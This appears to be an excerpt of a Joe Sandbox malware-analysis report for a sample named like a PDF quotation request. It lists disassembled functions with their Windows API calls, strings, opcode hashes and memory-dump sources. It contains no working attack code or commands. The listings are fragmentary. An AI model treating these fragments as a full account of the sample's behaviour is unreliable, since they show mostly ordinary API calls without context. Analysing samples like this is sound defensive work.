                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$Directory$CurrentSystem
                                                                    • String ID: D
                                                                    • API String ID: 1914653954-2746444292
                                                                    • Opcode ID: a7ea6aefa912430eef03ba2b36caf654fab562442e98e67eded85c7306b6573f
                                                                    • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                    • Opcode Fuzzy Hash: a7ea6aefa912430eef03ba2b36caf654fab562442e98e67eded85c7306b6573f
                                                                    • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                    Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicoll
                                                                    • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                    • API String ID: 3832890014-4202584635
                                                                    • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                    • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                    • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                    • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                    Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                    • GetFocus.USER32 ref: 0046A0DD
                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$CtrlFocus
                                                                    • String ID: 0
                                                                    • API String ID: 1534620443-4108050209
                                                                    • Opcode ID: 33db1e756ee58dcd531973e3b0852dc20df7a040fb788c70bc5d22ec5941dbda
                                                                    • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                    • Opcode Fuzzy Hash: 33db1e756ee58dcd531973e3b0852dc20df7a040fb788c70bc5d22ec5941dbda
                                                                    • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                    Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(?), ref: 004558E3
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateDestroy
                                                                    • String ID: ,$tooltips_class32
                                                                    • API String ID: 1109047481-3856767331
                                                                    • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                    • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                    • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                    • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                    Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                    • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                    • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                    • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                    • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                    • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                    • GetMenuItemCount.USER32 ref: 00468CFD
                                                                    • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                    • GetCursorPos.USER32(?), ref: 00468D3F
                                                                    • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                    • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                    • String ID: 0
                                                                    • API String ID: 1441871840-4108050209
                                                                    • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                    • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                    • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                    • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                    Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                    • __swprintf.LIBCMT ref: 00460915
                                                                    • __swprintf.LIBCMT ref: 0046092D
                                                                    • _wprintf.LIBCMT ref: 004609E1
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                    • API String ID: 3631882475-2268648507
                                                                    • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                    • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                    • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                    • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                    Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                    • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                    • SendMessageW.USER32 ref: 00471740
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                    • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                    • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                    • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                    • SendMessageW.USER32 ref: 0047184F
                                                                    • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                    • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                    • String ID:
                                                                    • API String ID: 4116747274-0
                                                                    • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                    • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                    • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                    • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                    Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                    • _wcslen.LIBCMT ref: 00461683
                                                                    • __swprintf.LIBCMT ref: 00461721
                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                    • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                    • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                    • GetParent.USER32(?), ref: 004618C3
                                                                    • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                    • String ID: %s%u
                                                                    • API String ID: 1899580136-679674701
                                                                    • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                    • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                    • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                    • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                    Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                    • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                    • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: InfoItemMenu$Sleep
                                                                    • String ID: 0
                                                                    • API String ID: 1196289194-4108050209
                                                                    • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                    • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                    • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                    • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                    Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 0043143E
                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                    • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                    • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                    • String ID: (
                                                                    • API String ID: 3300687185-3887548279
                                                                    • Opcode ID: 310223a7c2c425deceda40c7a51925335e337e9494f19c196f00ba520c5da5b8
                                                                    • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                    • Opcode Fuzzy Hash: 310223a7c2c425deceda40c7a51925335e337e9494f19c196f00ba520c5da5b8
                                                                    • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                    Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                      • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                    • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                    • API String ID: 1976180769-4113822522
                                                                    • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                    • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                    • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                    • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                    Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                    • String ID:
                                                                    • API String ID: 461458858-0
                                                                    • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                    • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                    • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                    • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                    Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                    • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                    • DeleteObject.GDI32(?), ref: 004301D0
                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
